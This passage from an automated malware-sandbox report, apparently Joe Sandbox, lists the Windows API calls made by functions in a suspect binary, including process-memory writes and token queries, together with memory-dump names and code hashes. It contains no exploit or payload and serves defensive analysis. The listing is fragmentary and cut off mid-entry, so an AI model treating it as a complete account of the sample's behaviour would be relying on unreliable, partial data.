                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00130B9B,?,?,?), ref: 0013112F
                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00130B9B,?,?,?), ref: 00131136
                                                                                                                                                                                                                                          • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0013114D
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 842720411-0
                                                                                                                                                                                                                                          • Opcode ID: 6eb05cc54c88c05b7419e7e960d963c43854d087abf4862ff08467dc9329dbe7
                                                                                                                                                                                                                                          • Instruction ID: b15b1154daa9f0353246bd953d2cd857e9fda146294efac8235b19f7ff6d9db3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6eb05cc54c88c05b7419e7e960d963c43854d087abf4862ff08467dc9329dbe7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EA011979200205FFDB114FA5DC49ABA3B6EEF8A3A0B244419FA85D7360DB71DC40DAA0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00130FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00130FCA
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00130FD6
                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00130FE5
                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00130FEC
                                                                                                                                                                                                                                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00131002
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 44706859-0
                                                                                                                                                                                                                                          • Opcode ID: e696da05b32ea2f38639f9c8cf6deac3acef7b8877cabfdd33d8bec3a7596cf1
                                                                                                                                                                                                                                          • Instruction ID: aa964a71ffe3648b67775901dd6125c06b655331af0fe426c5ac6c4d3b4cf396
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e696da05b32ea2f38639f9c8cf6deac3acef7b8877cabfdd33d8bec3a7596cf1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8CF04939200311FBDB214FA59C49F663BADEF8A762F204414FA89D6251CAB1DC808AA0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00131014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0013102A
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00131036
                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00131045
                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0013104C
                                                                                                                                                                                                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00131062
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 44706859-0
                                                                                                                                                                                                                                          • Opcode ID: b94c941807baf2d95be559ed2481b8c18f1f27272a67de6246f8bf3056ecfbc2
                                                                                                                                                                                                                                          • Instruction ID: 4f16d5138abbc9008c9cac8cd0ec3001a962f0016443f54a13e95c786926122a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b94c941807baf2d95be559ed2481b8c18f1f27272a67de6246f8bf3056ecfbc2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EAF06D39200311FBDB215FA5EC59F663BADFF8A761F200814FA85D7250CBB1D8808AA0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0014030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,0014017D,?,001432FC,?,00000001,00112592,?), ref: 00140324
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,0014017D,?,001432FC,?,00000001,00112592,?), ref: 00140331
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,0014017D,?,001432FC,?,00000001,00112592,?), ref: 0014033E
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,0014017D,?,001432FC,?,00000001,00112592,?), ref: 0014034B
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,0014017D,?,001432FC,?,00000001,00112592,?), ref: 00140358
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,0014017D,?,001432FC,?,00000001,00112592,?), ref: 00140365
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                                                                                                          • Opcode ID: 39d85853d1bf059f56d6521d820b9ecfcffff2e05cef4b40f0ae3c4dddff71fd
                                                                                                                                                                                                                                          • Instruction ID: 2d8afc62d660eae949f8c28d2185c1781c7c9230de3852165f51a1908c6ed618
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 39d85853d1bf059f56d6521d820b9ecfcffff2e05cef4b40f0ae3c4dddff71fd
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BB01AA72800B159FCB32AF66D890812FBF9BF643153158A3FD29652931C3B1A998CF80
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 0010D73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0010D752
                                                                                                                                                                                                                                            • Part of subcall function 001029C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0010D7D1,00000000,00000000,00000000,00000000,?,0010D7F8,00000000,00000007,00000000,?,0010DBF5,00000000), ref: 001029DE
                                                                                                                                                                                                                                            • Part of subcall function 001029C8: GetLastError.KERNEL32(00000000,?,0010D7D1,00000000,00000000,00000000,00000000,?,0010D7F8,00000000,00000007,00000000,?,0010DBF5,00000000,00000000), ref: 001029F0
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0010D764
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0010D776
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0010D788
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0010D79A
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                                                                          • Opcode ID: 53e2be19b711a2e9bb53924a45cd891ecd6cc24b94c0923763d2d9a9a3c98df9
                                                                                                                                                                                                                                          • Instruction ID: e945bf947e9ac6f974543a65838be6768d1911f1a1c22efc9f099e013388d2e8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 53e2be19b711a2e9bb53924a45cd891ecd6cc24b94c0923763d2d9a9a3c98df9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 35F01232544219ABC621EBA8F9C6C1677DDBB547187A50806F1C8E7981C7B0FC8086B4
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00135C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00135C58
                                                                                                                                                                                                                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 00135C6F
                                                                                                                                                                                                                                          • MessageBeep.USER32(00000000), ref: 00135C87
                                                                                                                                                                                                                                          • KillTimer.USER32(?,0000040A), ref: 00135CA3
                                                                                                                                                                                                                                          • EndDialog.USER32(?,00000001), ref: 00135CBD
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3741023627-0
                                                                                                                                                                                                                                          • Opcode ID: be8d59f1dabbf68a41650c0d8cd98f126e0d6d866e6a6b4d33f0b1ea339c55a8
                                                                                                                                                                                                                                          • Instruction ID: ccdd157ae31d7df3703786007395b42292c656e4475a00d523bb33b6b5c9fad4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: be8d59f1dabbf68a41650c0d8cd98f126e0d6d866e6a6b4d33f0b1ea339c55a8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F9018630500B04ABEB245B10DD4EFB67BBDBB00B06F04155AE583A19E1DBF4A9C4CA94
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 001022A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 001022BE
                                                                                                                                                                                                                                            • Part of subcall function 001029C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0010D7D1,00000000,00000000,00000000,00000000,?,0010D7F8,00000000,00000007,00000000,?,0010DBF5,00000000), ref: 001029DE
                                                                                                                                                                                                                                            • Part of subcall function 001029C8: GetLastError.KERNEL32(00000000,?,0010D7D1,00000000,00000000,00000000,00000000,?,0010D7F8,00000000,00000007,00000000,?,0010DBF5,00000000,00000000), ref: 001029F0
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 001022D0
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 001022E3
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 001022F4
                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00102305
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                                                                          • Opcode ID: 867b86235ce539405372bc39ee02c569b0aa2eff67becc07ec0ee16f08508a90
                                                                                                                                                                                                                                          • Instruction ID: 0d17ce3e66329b7682f497693e3d8d13d099497518f075853fae1fd72a01b4dd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 867b86235ce539405372bc39ee02c569b0aa2eff67becc07ec0ee16f08508a90
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DAF03AB48101289FCA13BF94BC059483B64B72AB60B60050BF490E3AF1C7705891AFE4
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 000E95C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • EndPath.GDI32(?), ref: 000E95D4
                                                                                                                                                                                                                                          • StrokeAndFillPath.GDI32(?,?,001271F7,00000000,?,?,?), ref: 000E95F0
                                                                                                                                                                                                                                          • SelectObject.GDI32(?,00000000), ref: 000E9603
                                                                                                                                                                                                                                          • DeleteObject.GDI32 ref: 000E9616
                                                                                                                                                                                                                                          • StrokePath.GDI32(?), ref: 000E9631
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2625713937-0
                                                                                                                                                                                                                                          • Opcode ID: 84b303ed53dccb4428d9d5ea399644dcd29df3016f29db104a5fce2b9064bbc1
                                                                                                                                                                                                                                          • Instruction ID: aef2f2bca5212ae1f46da0e061fd0a908a95c496d4b19e9242bb9d011145387f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 84b303ed53dccb4428d9d5ea399644dcd29df3016f29db104a5fce2b9064bbc1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0CF03735006748FFDB225F6AED1CB7A3BA1AB0236AF048215F4A5658F0C77089D5DF60
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00100F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: __freea$_free
                                                                                                                                                                                                                                          • String ID: a/p$am/pm
                                                                                                                                                                                                                                          • API String ID: 3432400110-3206640213
                                                                                                                                                                                                                                          • Opcode ID: b51feb5f31aca9e676ed05e4e8a779acdc75478354270fa4b6773430d298adde
                                                                                                                                                                                                                                          • Instruction ID: 2be2015dfe370b6f8243a137c7cf3dbfb3ccc5b94e98e470a09c166e491edbd1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b51feb5f31aca9e676ed05e4e8a779acdc75478354270fa4b6773430d298adde
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 49D1F131900206EADB289F68C885BFAB7B1FF05310F294159E9C19FAD1D3F99D80CB91
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00157B7E Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 230COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 000F0242: EnterCriticalSection.KERNEL32(001A070C,001A1884,?,?,000E198B,001A2518,?,?,?,000D12F9,00000000), ref: 000F024D
                                                                                                                                                                                                                                            • Part of subcall function 000F0242: LeaveCriticalSection.KERNEL32(001A070C,?,000E198B,001A2518,?,?,?,000D12F9,00000000), ref: 000F028A
                                                                                                                                                                                                                                            • Part of subcall function 000D9CB3: _wcslen.LIBCMT ref: 000D9CBD
                                                                                                                                                                                                                                            • Part of subcall function 000F00A3: __onexit.LIBCMT ref: 000F00A9
                                                                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 00157BFB
                                                                                                                                                                                                                                            • Part of subcall function 000F01F8: EnterCriticalSection.KERNEL32(001A070C,?,?,000E8747,001A2514), ref: 000F0202
                                                                                                                                                                                                                                            • Part of subcall function 000F01F8: LeaveCriticalSection.KERNEL32(001A070C,?,000E8747,001A2514), ref: 000F0235
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                                                                                                                                                                                                          • String ID: 5$G$Variable must be of type 'Object'.
                                                                                                                                                                                                                                          • API String ID: 535116098-3733170431
                                                                                                                                                                                                                                          • Opcode ID: 7db2a530919fc4203770dfe3bc1cadbbebf7acdbfe9a8103be20689cf7606ffc
                                                                                                                                                                                                                                          • Instruction ID: 8dc3972f0207abebda786764e70cae6c770eac8959c4490f79f7d1f99b45ef65
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7db2a530919fc4203770dfe3bc1cadbbebf7acdbfe9a8103be20689cf7606ffc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A5916D74A04209EFCB04EF94E9929BDB7B1FF45301F108059F826AF292DB71AE49CB51
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00105AA9 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: JO
                                                                                                                                                                                                                                          • API String ID: 0-2333933171
                                                                                                                                                                                                                                          • Opcode ID: a56a816ed95738036b07a02ef7f8d63aa47426f8f224cdea0c8a01a284535e9e
                                                                                                                                                                                                                                          • Instruction ID: 779101fdab940df63b36ba780ea77d8421845a4483d01790a85482576815dbf9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a56a816ed95738036b07a02ef7f8d63aa47426f8f224cdea0c8a01a284535e9e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6451CD7190060A9FDB259FA4C949AFFBBBAAF09310F14005AF485A72D2D7B19A01DF61
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00132716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0013B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,001321D0,?,?,00000034,00000800,?,00000034), ref: 0013B42D
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00132760
